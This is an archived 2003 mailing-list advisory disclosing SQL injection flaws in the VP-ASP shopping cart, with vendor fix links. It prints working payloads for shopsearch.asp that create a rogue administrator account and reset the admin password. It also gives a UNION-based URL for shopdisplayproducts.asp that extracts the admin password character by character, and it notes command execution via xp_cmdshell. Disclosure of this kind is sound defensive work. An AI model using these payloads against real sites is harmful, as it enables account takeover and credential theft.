[NT] Virtual Programming VP-ASP Shopping Cart Multiple SQL Injection Vulnerabilities

• Previous message: SecuriTeam: "[NEWS] Fortigate Firewall Web Interface Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 1 Dec 2003 17:46:41 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Virtual Programming VP-ASP Shopping Cart Multiple SQL Injection
Vulnerabilities
------------------------------------------------------------------------

SUMMARY

Virtual Programming <http://www.vpasp.com> VP-ASP is "a shopping cart
application for e-commerce enabled sites. It is written in ASP, supports
the following databases: Access, MSSQL, MySQL on Windows and MySQL on
UNIX".

VP-ASP suffers from SQL injection vulnerabilities, which may allow an
attacker in some cases to gain administrative access to the installed
VP-ASP Shopping Cart software or execute arbitrary commands on a target's
system.

DETAILS

Vulnerability 1: SQL Injection Vulnerability in 'shopsearch.asp' Script
An SQL Injection vulnerability has been found in the shopsearch.asp
script. User supplied input is not filtered before being used in a SQL
query. Consequently, query modification using malformed input is possible.
Exploitation of the vulnerability allows a remote attacker to insert a new
user with administrative privileges. A more sophisticated exploitation
would allow a remote attacker to execute arbitrary commands on a target's
system (via MSSQL xp_cmdshell() function for example).

Exploit:
Platform: Win32/MSSQL

Posting this data to shopsearch.asp creates new administrative account:
Keyword=&category=5); insert into tbluser (fldusername) values
('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

Posting this data to shopsearch.asp changes admin password
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Vulnerability 2: SQL Injection Vulnerability in 'shopdisplayproducts.asp'
Script
An SQL Injection vulnerability has been found in the
shopdisplayproducts.asp script. Exploitation of the vulnerability will
allow remote attacker to read any information from a database.

Exploit:
Platform: Win32/MSSQL
http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

Changing value at the end of request
%20'a%25'--
%20'b%25'--
%20'c%25'--
..

And looking through the HTTP response from VP-ASP web server attacker can
find the administrator password.

Solution:
S-Quadra alerted VP-ASP development team to this issue on 28th November
2003. Security fixes from VP-ASP development team available at:
<http://www.vpasp.com/virtprog/info/faq_securityfixes.htm>
http://www.vpasp.com/virtprog/info/faq_securityfixes.htm.

ADDITIONAL INFORMATION

The original advisory is available from:
<http://www.s-quadra.com/advisories/Adv-20031128.txt>
http://www.s-quadra.com/advisories/Adv-20031128.txt.

The information has been provided by <mailto:cipher@s-quadra.com> Nick
Gudov.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] Fortigate Firewall Web Interface Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]